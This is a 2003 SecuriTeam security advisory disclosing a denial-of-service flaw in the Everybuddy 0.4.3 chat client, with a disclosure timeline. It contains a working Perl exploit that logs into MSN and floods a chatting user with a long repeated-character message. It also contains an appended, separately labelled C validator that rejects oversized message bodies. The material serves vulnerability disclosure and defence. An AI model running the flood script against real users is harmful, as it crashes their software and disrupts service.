[NEWS] Everybuddy Vulnerable to a DoS Attack (Long Message)
From: SecuriTeam (support_at_securiteam.com)
Date: 08/05/03
To: list@securiteam.com
Date: 5 Aug 2003 12:55:00 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Everybuddy Vulnerable to a DoS Attack (Long Message)
------------------------------------------------------------------------
SUMMARY
<http://www.everybuddy.com/en/index.php> Everybuddy has support for AIM,
ICQ, MSN, Yahoo! and Jabber chat programs. The program contains a security
vulnerability that allows remote attackers to crash it by sending it an
overly long instant message.
DETAILS
Vulnerable systems:
* Everybuddy version 0.4.3
Exploit:
The exploit code will log in as a user, wait for someone to talk to him,
and send him the attack string.
#!/usr/bin/perl
use MSN; # from <http://www.adamswann.com/library/2002/msn-perl/>

my $client = MSN->new();
$client->connect('email address', 'password', '', {
    Status  => \&Status,
    Answer  => \&Answer,
    Message => \&Message,
    Join    => \&Join }
);

sub Status {
    my ($self, $username, $newstatus) = @_;
    print "Status() called with parameters:\n";
    print " " . join(",", @_), "\n";
    # Print the status change info.
    print "${username}'s status changed from " .
        $self->buddystatus($username) . " to $newstatus.\n";
    # Initiate the call.
    $self->call($username);
    # The call may take a few seconds to complete, so we can't
    # immediately send messages. Let's put the message in a
    # FIFO (queue) that is keyed by username.
    push (@{$queue{$username}}, "Glad to see you online!");
}

sub Message {
    my ($self, $username, undef, $msg) = @_;
    print "Message() called with parameters:\n";
    print " " . join(",", @_), "\n";
}

sub Join {
    my ($self, $username) = @_;
    print "Join() called with parameters:\n";
    print " " . join(",", @_), "\n";
    # See if there's anything queued up.
    # Deliver each message if there is stuff in the queue for this user.
    while ($_ = shift @{$queue{$username}}) {
        $$self->sendmsg($_);
    }
}

sub Answer {
    my ($self, $username) = @_;
    print "Answer() called with parameters:\n";
    print " " . join(",", @_), "\n";
    # Send a hello message.
    $$self->sendmsg("AAAAAAAAAAAAAAAAAAAAAAAAAAA\r"x55);
}
Vendor status:
After numerous attempts to contact the vendor (in some cases the vendor
replied, but then disappeared again), we are forced to release this
information, without receiving a proper response from them.
Disclosure timeline:
19/06/2003 - First attempt to contact vendor
20/06/2003 - First vendor response
22/06/2003 - PoC provided to vendor
01/07/2003 - Second attempt to contact vendor
01/08/2003 - Third attempt to contact vendor
05/08/2003 - Public advisory
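Added example (not part of the original advisory and not Everybuddy code): a receive-side check in C that parses an MSN-style "MSG" frame and refuses any message body over a fixed cap instead of truncating it or passing it on. The advisory does not state the root cause of the crash; the cap MAX_IM_BODY, the function names and the sample frame built in check_repeated() are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_IM_BODY 1024 /* assumed policy cap; not a value from the advisory */
enum { IM_OK = 0, IM_MALFORMED = -1, IM_TOO_LONG = -2 };

/* Bounded substring search (memmem is not portable). */
static const char *find_seq(const char *h, size_t hl, const char *n, size_t nl)
{
    for (size_t i = 0; nl <= hl && i <= hl - nl; i++)
        if (memcmp(h + i, n, nl) == 0) return h + i;
    return NULL;
}

/* Validate "MSG <from> <nick> <len>\r\n<payload>" (payload = MIME headers,
 * blank line, body). On IM_OK the body is copied to out, NUL-terminated. */
static int im_accept(const char *frame, size_t flen, char *out, size_t cap)
{
    const char *eol, *sp, *payload, *body;
    char *end;
    size_t plen, blen;
    if (flen < 4 || memcmp(frame, "MSG ", 4) != 0) return IM_MALFORMED;
    if (!(eol = find_seq(frame, flen, "\r\n", 2))) return IM_MALFORMED;
    for (sp = eol; sp[-1] != ' '; ) sp--;   /* last field is the length */
    if (*sp < '0' || *sp > '9') return IM_MALFORMED;
    plen = strtoul(sp, &end, 10);
    payload = eol + 2;
    if (end != eol || plen != flen - (size_t)(payload - frame))
        return IM_MALFORMED;                /* declared length must match */
    if (!(body = find_seq(payload, plen, "\r\n\r\n", 4))) return IM_MALFORMED;
    body += 4;
    blen = plen - (size_t)(body - payload);
    if (blen > MAX_IM_BODY || blen >= cap) return IM_TOO_LONG; /* never truncate */
    memcpy(out, body, blen);
    out[blen] = '\0';
    return IM_OK;
}

/* Constructed test input: wrap `unit` repeated n times in a frame and check it. */
static int check_repeated(const char *unit, size_t n)
{
    static const char hdr[] = "MIME-Version: 1.0\r\nContent-Type: text/plain\r\n\r\n";
    char frame[8192], out[MAX_IM_BODY + 1];
    size_t plen = sizeof hdr - 1 + strlen(unit) * n;
    if (plen > sizeof frame - 64) return IM_TOO_LONG;
    int off = snprintf(frame, sizeof frame, "MSG a@example.com a %zu\r\n%s", plen, hdr);
    for (size_t i = 0; i < n; i++) off += sprintf(frame + off, "%s", unit);
    return im_accept(frame, (size_t)off, out, sizeof out);
}
```

A body of the size sent by the code above is rejected with IM_TOO_LONG before any copy takes place, while a short message is accepted.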
ADDITIONAL INFORMATION
The information has been provided by <mailto:noamr@beyondsecurity.com>
Noam Rathaus and <mailto:expert@securiteam.com> SecurITeam Experts.